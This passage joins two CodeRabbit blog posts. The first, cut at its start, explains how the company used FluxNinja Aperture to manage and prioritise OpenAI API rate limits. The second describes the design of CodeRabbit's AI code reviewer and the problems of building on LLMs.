a makeshift solution for our API client: * We set up four separate OpenAI accounts to distribute the load. * Implemented an API concurrency limit on each reviewer instance to cap the number of in-flight requests to OpenAI. * Increased the back-off time for each retry and increased the number of retries. OpenAI's rate limit headers were not helpful in determining the optimal back-off times, as the [headers](https://platform.openai.com/docs/guides/rate-limits/rate-limits-in-headers) were outdated by tens of seconds and do not consider the in-flight requests. * Transitioned from function-based serverless framework to a containerized environment to benefit from extended timeout capabilities to ensure that instances would not be terminated while requests were in the retry-back-off loop. Although these adjustments provided temporary relief, the challenges resurfaced as the load increased within a few days. We were doing much guesswork to figure out the "right" number of concurrent requests, back-off times, max retries and so on. Complicating matters further, we added a chat feature that allows users to consult the CodeRabbit bot for code generation and technical advice. While we aimed for real-time responses, the back-off mechanisms made reply time unpredictable, particularly during peak usage, thereby degrading the user experience. We needed a better solution, one that could globally manage the rate limits across all reviewer instances and prioritize requests based on user tiers and the nature of requests. ## FluxNinja Aperture to the rescue[](https://blog.coderabbit.ai/blog/coderabbit-openai-rate-limits#fluxninja-aperture-to-the-rescue) We were introduced to the [FluxNinja Aperture](https://www.fluxninja.com/) load management platform by one of our advisors. [Aperture](https://github.com/fluxninja/aperture) is an open-source load management platform that offers advanced rate-limiting, request prioritization, and quota management features. Essentially, Aperture serves as a global token bucket, facilitating client-side rate limits and business-attribute-based request prioritization. ### Implementing the Aperture TypeScript SDK in our reviewer service[](https://blog.coderabbit.ai/blog/coderabbit-openai-rate-limits#implementing-the-aperture-typescript-sdk-in-our-reviewer-service) Our reviewer service runs on Google Cloud Run, while the Aperture Agents are deployed on a separate Kubernetes cluster (GKE). To integrate with the Aperture Agents, we employ Aperture's TypeScript SDK. Before calling OpenAI, we rely on Aperture Agent to gate the request using the `StartFlow` method. To provide more context to Aperture, we also attach the following labels to each request: * `model_variant`: This specifies the model variant being used (`gpt-4`, `gpt-3.5-turbo`, or `gpt-3.5-turbo-16k`). Requests and tokens per minute rate limit policies are set individually for each model variant. * `api_key` - This is a cryptographic hash of the OpenAI API key, and rate limits are enforced on a per-key basis. * `estimated_tokens`: As the tokens per minute quota limit is enforced based on the [estimated tokens for the completion request](https://platform.openai.com/docs/guides/rate-limits/reduce-the-max_tokens-to-match-the-size-of-your-completions), we need to provide this number for each request to Aperture for metering. Following OpenAI's [guidance](https://help.openai.com/en/articles/4936856-what-are-tokens-and-how-to-count-them), we calculate `estimated_tokens` as `(character_count / 4) + max_tokens`. Note that OpenAI's rate limiter doesn't tokenize the request using the model's specific tokenizer but relies on a character count-based heuristic. * `product_tier`: CodeRabbit offers both `pro` and `free` tiers. The `pro` tier provides comprehensive code reviews, whereas the `free` tier offers only the summary of the pull request. * `product_reason`: We also label why a review was initiated under the `pro` tier. For example, the reasoning could that the user is a `paid_user`, `trial_user` or a `open_source_user`. Requests to OpenAI are prioritized based on these labels. * `priority`: Requests are ranked according to a priority number provided in this label. For instance, requests from `paid_user` are given precedence over those from `trial_user` and `open_source_user`. The base priority is incremented for each file reviewed, enabling pull requests that are further along in the review process to complete more quickly than newly submitted ones. Additionally, chat messages are assigned a much higher priority compared to review tasks. ![](https://framerusercontent.com/images/aCvZzngJXymwfYDVcMKq2XDKlM.png) Integration with Aperture TypeScript SDK ### Policy configuration in Aperture: Aligning with OpenAI's rate limits[](https://blog.coderabbit.ai/blog/coderabbit-openai-rate-limits#policy-configuration-in-aperture-aligning-with-openais-rate-limits) Aperture offers a foundational "blueprint" for [managing quotas](https://docs.fluxninja.com/reference/blueprints/quota-scheduling/base), comprising two main components: * **Rate limiter:** OpenAI employs a token bucket algorithm to impose rate limits, and that is directly compatible with Aperture's rate limiter. For example, in the tokens per minute policy for `gpt-4`, we have allocated a burst capacity of `40000 tokens`, and a refill rate of `40000 tokens per minute`. The bucket begins to refill the moment the tokens are withdrawn, aligning with OpenAI's rate-limiting mechanism. This ensures our outbound request and token rate remains synchronized with OpenAI's enforced limits. * **Scheduler:** Aperture has a [weighted fair queuing](https://docs.fluxninja.com/concepts/scheduler/) scheduler that prioritizes the requests based on multiple factors such as the number of tokens, priority levels and workload labels. By fine-tuning these two components in Aperture, we can go as fast as we can, with optimal user experience, while ensuring that we don't exceed the rate limits. Client-side quota management policies for gpt-4 ## Reaping the benefits[](https://blog.coderabbit.ai/blog/coderabbit-openai-rate-limits#reaping-the-benefits) During peak hours, we typically process tens of pull requests, hundreds of files, and chat messages concurrently. The image below shows the incoming token rate and the accepted token rate for the `gpt-4` tokens-per-minute policy. We can observe that the incoming token rate is spiky, while the accepted token rate remains smooth and hovers around `666 tokens per second`. This roughly translates to `40,000 tokens per minute`. Essentially, Aperture is smoothing out the fluctuating incoming token rate to align it with OpenAI's rate limits. ![](https://framerusercontent.com/images/tVKawcfxMtGtulPpNuuHSUVxVM.png) The below image shows request prioritization metrics from the Aperture Cloud console during the same peak load period: ![](https://framerusercontent.com/images/VXO8ccw5QJvUSCeam41bZRISrQ.png) In the upper left panel of the metrics, noticeable peaks indicate that some requests got queued for several minutes in Aperture. We can verify that the trial and free-tier users tend to experience longer queue times compared to their paid counterparts and chat requests. Queue wait times can fluctuate based on the volume of simultaneous requests in each workload. For example, wait times are significantly longer during peak hours as compared to off-peak hours. Aperture provides scheduler preemption metrics to offer further insight into the efficacy of prioritization. As observed in the lower panels, these metrics measure the relative impact of prioritization for each workload by comparing how many tokens a request gets preempted or delayed in the queue compared to a purely First-In, First-Out (FIFO) ordering. In addition to effectively managing the OpenAI quotas, Aperture provides insights into OpenAI API performance and errors. The graphs below show the overall response times for various OpenAI models we use. We observe that the `gpt-4` family of models is significantly slower compared to the `gpt-3.5-turbo` family of models. This is quite insightful, as it hints at why OpenAI's infrastructure struggles to meet demand - these APIs are not just simple database or analytics queries; they are computationally expensive to run. ![](https://framerusercontent.com/images/Te7MPRH8HaivWTczZWpZ6YBlqrM.png) ## Conclusion[](https://blog.coderabbit.ai/blog/coderabbit-openai-rate-limits#conclusion) Aperture has been a game-changer for CodeRabbit. It has enabled us to continue signing up users and growing our usage without worrying about OpenAI rate limits. Without Aperture, our business would have hit a wall and resorted to a wait-list approach, which would have undermined our traction. Moreover, Aperture has provided us with valuable insights into OpenAI API performance and errors, helping us monitor and improve the overall user experience. In the realm of generative AI, we are dealing with a fundamentally different nature of API dynamics. Performance wise, these APIs are an order of magnitude slower than traditional APIs. We believe that request scheduling and prioritization will become a critical component of the AI infrastructure stack, and with Aperture, FluxNinja is well positioned to be the leader in this space. As CodeRabbit continues to build and add additional components such as vector databases, which are also computationally expensive, we are confident that Aperture will continue to help us offer a reliable experience to our users.

AI and the Future of Code Reviews - A Deep Dive into CodeRabbit

Aravind Putrevu — Tue, 22 Aug 2023 00:00:00 GMT

We are witnessing an inflection point in the software development industry. Developers around the world have been realizing the incredible possibilities that AI can bring. The introduction of [GitHub Copilot](https://github.com/features/copilot) and [ChatGPT](https://chat.openai.com/auth/login) have revolutionized software development. They have been the [fastest-growing tools](https://aibusiness.com/companies/one-year-on-github-copilot-adoption-soars) in the history of software development While on the code generation side, many tools have emerged, the code review process has remained largely unchanged. We continue to use the same tools and processes that were used 10 years ago. The code is still manually reviewed, which is slow, error-prone, and expensive. To address this, we are building [CodeRabbit](https://coderabbit.ai/), an AI-powered code reviewer that is part of the code merge and CI/CD process. With CodeRabbit our vision is to speed up the code merge process by an order of magnitude, while also improving the quality of the code that goes beyond what is possible with human reviewers alone and existing linting tools. ## Impediments to shipping quality software @Speed[](https://blog.coderabbit.ai/blog/coderabbit-deep-dive#impediments-to-shipping-quality-software-speed) An average developer spends most of their time between writing and reviewing the code. Typically, the development process involves branching off from the main code base, developing a new feature or fixing a bug, and then merging the code back into the mainline. To write software, developers use modern editors such as Visual Studio Code which include sophisticated language servers, static analyzers and linters. These tools are being rapidly augmented by AI-powered extensions such as GitHub Copilot. Local development tools are just one part of the equation. Relying on local tools alone is not sufficient to prevent quality issues, as they are inconsistent across the developers, which makes it difficult to enforce standards. To ensure quality, the code is merged collaboratively in the form of [pull requests (PR)](https://docs.github.com/en/pull-requests) in platforms such as GitHub/GitLab. As soon as the PR is opened, the CI/CD process kicks in. The code is linted, compiled and tested. Most importantly, the code is reviewed by a peer who checks for the intention of changes, in addition to looking for coding standards, security vulnerabilities, and other issues. The reviews require a broader context to not just understand the changes but also evaluate the impact on the larger codebase. The reviewer approves the PR, and the code is merged into the main codebase. The code review is required not just for the quality of the code but also for meeting compliance and regulatory requirements. While the ideal code review process sounds smooth and efficient, the reality is often riddled with challenges and inefficiencies. Specifically, the manual review is often the slowest part of the development process. It is not uncommon for a **PR** to take days or even weeks to get merged. Here's a brief glimpse into the challenges: **Team Slowdown:** The waiting period for code reviews and merges affects not just individual developers but the whole team. Project timelines get stretched, leading to delays in launching new features or fixing critical bugs. **Context Switching:** Developers often lose context when they switch from coding to waiting for a review. Getting back into the code takes time and mental energy, which hampers productivity. **Rubber-Stamp Reviews:** In dysfunctional teams, the code review process can become a mere formality. Reviewers might approve code without thorough inspection, allowing bugs and vulnerabilities to slip through. **Personality Clashes:** Sometimes, friction between the developer and the reviewer goes beyond code quality, leading to nitpicking and unnecessary delays. This can create a toxic work environment, affecting the team's morale. **Job Dissatisfaction:** Continual delays and inefficiencies in the code merge process can often demoralize developers to the point where they consider switching jobs, affecting the company's retention rates. In summary, the status-quo is not ideal, and it is evident from the software bugs, security vulnerabilities, and the service outages that frequently plague the software industry. ## Merging code 10x faster with CodeRabbit[](https://blog.coderabbit.ai/blog/coderabbit-deep-dive#merging-code-10x-faster-with-coderabbit) CodeRabbit is an AI-powered code reviewer that significantly speeds up the code review process while also improving the quality of the code. It works seamlessly within the pull request workflow and collaborates with the developer and the reviewer to ensure code quality. It goes beyond existing linters and static code analysis tools in uncovering issues and suggesting improvements by providing a human-like understanding of the objective of the code. With CodeRabbit, developers get context-aware feedback within minutes, which enables them to make improvements based on best practices and get their code ready to be merged faster. CodeRabbit also helps reviewers by providing them with confidence and speed to approve the code faster. Reviewers can use CodeRabbit's auto-generated walkthrough and suggestions as a starting point for their review. Peer reviewer can have a three-way collaboration including the developer, and CodeRabbit, which can significantly enrich the review experience while saving them time and effort. CodeRabbit is built on top of the generative AI to provide the following key capabilities: **Summarization:** CodeRabbit summarizes the code changes in the PR and provides a high-level overview. This helps the reviewer and product team to quickly understand the changes and the impact on the product. **Incremental Reviews:** CodeRabbit thoroughly reviews the code after each commit and provides incremental feedback to the developer. It uncovers issues and suggests improvements by commenting on the code like a human reviewer. **Chat about changes:** CodeRabbit provides conversational capability that allows developers and reviewers to ask questions, generate code, and get feedback in the context of changes. ## Designing CodeRabbit[](https://blog.coderabbit.ai/blog/coderabbit-deep-dive#designing-coderabbit) The review process is multi-stage and shown in the figure below. CodeRabbit's workflow is triggered when a developer opens a pull request or commits code to an existing pull request. This is followed by various summarization and review stages. ![](https://framerusercontent.com/images/Y83rpWAtskEjGPenr3dNOUm6mY.png) CodeRabbit is not just a simple wrapper that does pass-through to the LLM models. To circumvent context size limits, CodeRabbit uses an innovative, multi-LLM and multi-stage approach to scale reviews for larger change sets. Unlike AI-based code completion tools, code reviews are a much more complex problem. The reviewer context is much broader than the developer context, as the reviewer needs to uncover not just obvious issues but also understand the larger context of the pull request and changes across multiple files. Below is a glimpse into the challenges we faced and the solutions we came up with: **Context window size:** The LLM models have limited context windows, for instance, `gpt-3.5-turbo` has a context window of 4K or 16K tokens and `gpt-4` has a context window of 8K tokens. This is often insufficient to pack larger change sets. To circumvent this, we provide various summaries while reviewing changes to each file and by smartly prioritizing context that is packed in each request. **Inputting and outputting structured content:** LLMs are particularly bad at understanding and generating structured content and mathematical computation. We had to design new input formats, that are closer to how humans understand changes, instead of using the standard unified diff format. We also had to provide few-shot examples to the LLMs to get the desired results. **Noise:** LLMs are terrible at differentiating between noise and signal. For instance, if you ask LLMs for 20 suggestions, you will get them, but only a few of them will be useful. This is particularly true for code reviews. We had to design a multi-stage review process that reinforces the signal and filters out the noise. **Costs:** While advanced models like `gpt-4` are great in performing complex tasks, they are several orders of magnitude more expensive than models like `gpt-3.5-turbo`. We had to design a multimodel approach that uses simpler models for summarizations, while complex models are used for tasks such as reviewing code. In addition, simpler models act as a triage filter that identifies the changes that need to be thoroughly reviewed by more complex models. **Inaccuracies:** LLMs are not perfect and often return inaccurate results, and they sometimes even ignore instructions and completely fabricate a response. Rather than keep fighting the LLMs, we wrote layers of sanity checks to fix or hide the inaccuracies from the user. **Data privacy:** The biggest concern from our users is whether their code is being stored and used to train the models. We made sure that all queries to LLMs are ephemeral, and the data is discarded right away from our service. At the same time, it's challenging to provide stateful incremental reviews without storing the data. We had to design a system that stores all state within the pull request itself and not in our service for maximum privacy. ![](https://framerusercontent.com/images/w4qdCaDYNNioaxnETqhwoiTkKQ.png) ## Conclusion[](https://blog.coderabbit.ai/blog/coderabbit-deep-dive#conclusion) Building on top of LLMs is a new space, and we can draw parallels to how early software such as MS-DOS were built on top of IBM PC and Intel microprocessors. Even with limited memory, [killer applications](https://www.pcmag.com/news/the-ibm-pcs-killer-apps-where-are-they-now) were built. The context size limits of LLMs are similar to the memory limits of early PCs. Innovation is required to build sophisticated applications on top of LLMs that give the impression of a much larger context, just like early [3D games](https://en.wikipedia.org/wiki/Doom_$1993_video_game$) used innovative techniques to run even on modest PCs. It's quite likely that immense value will be captured by the applications while underlying LLMs and AI infrastructure such as vector databases will continue to get commoditized. In addition, the line between the actual model training and the prompting continues to be blurred. Prompts with few-shot examples and fine-tuning can make a big difference in the quality of results and is an area that will differentiate products that build on top of LLMs. At CodeRabbit, we are at the forefront of this innovation by building an AI-first developer tools company from the ground up. We are approaching this problem from first principles, as the techniques being used bear little resemblance to the existing tools like linters and static code analysis tools. We are witnessing an inflection point as AI has crossed the practicality threshold, despite its limitations. Furthermore, we believe that we can keep innovating around the limitations and bring sophisticated products that push the boundaries of what is possible with AI. We are excited about our roadmap and hope to unlock immense value for our customers in the near future.